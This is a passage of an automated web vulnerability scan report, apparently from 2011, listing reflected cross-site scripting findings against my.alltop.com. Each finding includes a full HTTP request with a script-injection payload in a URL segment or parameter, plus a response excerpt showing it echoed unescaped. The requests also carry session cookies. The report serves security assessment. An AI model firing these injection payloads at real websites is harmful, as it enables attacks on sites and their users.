Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%22ns=%22netsparker(0x000167)?1219d"><script>alert(1)</script>2819410e845=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.54. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb9a"><script>alert(1)</script>ff1b333cc02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/bfdb9a"><script>alert(1)</script>ff1b333cc02/%2522ns%253D%2522netsparker%25280x00016F%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/bfdb9a"><script>alert(1)</script>ff1b333cc02/%2522ns%253D%2522netsparker%25280x00016F%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.55. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d265f"><script>alert(1)</script>92094049460 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)d265f"><script>alert(1)</script>92094049460 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)d265f"><script>alert(1)</script>92094049460" method="post" accept-charset="utf-8">
...[SNIP]...

1.56. http://my.alltop.com/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e9e"><script>alert(1)</script>79aab178e4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)?61e9e"><script>alert(1)</script>79aab178e4d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:08 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:08 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b/%2522ns%253D%2522netsparker%25280x00016F%2529)?61e9e"><script>alert(1)</script>79aab178e4d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.57. http://my.alltop.com/alpha/c ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The value of the '"--></style></script><script>netsparker(0x00018C)</script> request parameter is copied into the HTML document as plain text between tags. The payload 9fced<script>alert(1)</script>bd34e81b8f8 was submitted in the '"--></style></script><script>netsparker(0x00018C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c?'"--></style></script><script>netsparker(0x00018C)</script>9fced<script>alert(1)</script>bd34e81b8f8 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>9fced<script>alert(1)</script>bd34e81b8f8" method="post" accept-charset="utf-8">
...[SNIP]...

1.58. http://my.alltop.com/alpha/c [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a26"><script>alert(1)</script>426f2377b29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c34a26"><script>alert(1)</script>426f2377b29 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:46 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:46 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c34a26"><script>alert(1)</script>426f2377b29" method="post" accept-charset="utf-8">
...[SNIP]...

1.59. http://my.alltop.com/alpha/c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd77"><script>alert(1)</script>4ca4dc8f88d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c?2dd77"><script>alert(1)</script>4ca4dc8f88d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:40 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:40 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:40 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c?2dd77"><script>alert(1)</script>4ca4dc8f88d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.60. http://my.alltop.com/alpha/c [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea909"><script>alert(1)</script>5abb68af84 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FC)%3C/script%3Eea909"><script>alert(1)</script>5abb68af84 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:34 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:34 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FC)%3C/script%3Eea909"><script>alert(1)</script>5abb68af84" method="post" accept-charset="utf-8">
...[SNIP]...

1.61. http://my.alltop.com/alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc71"><script>alert(1)</script>956351dc9d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c'%22--%3E%3C3dc71"><script>alert(1)</script>956351dc9d0/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:28 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:30 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:30 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c'%22--%3E%3C3dc71"><script>alert(1)</script>956351dc9d0/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000179)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

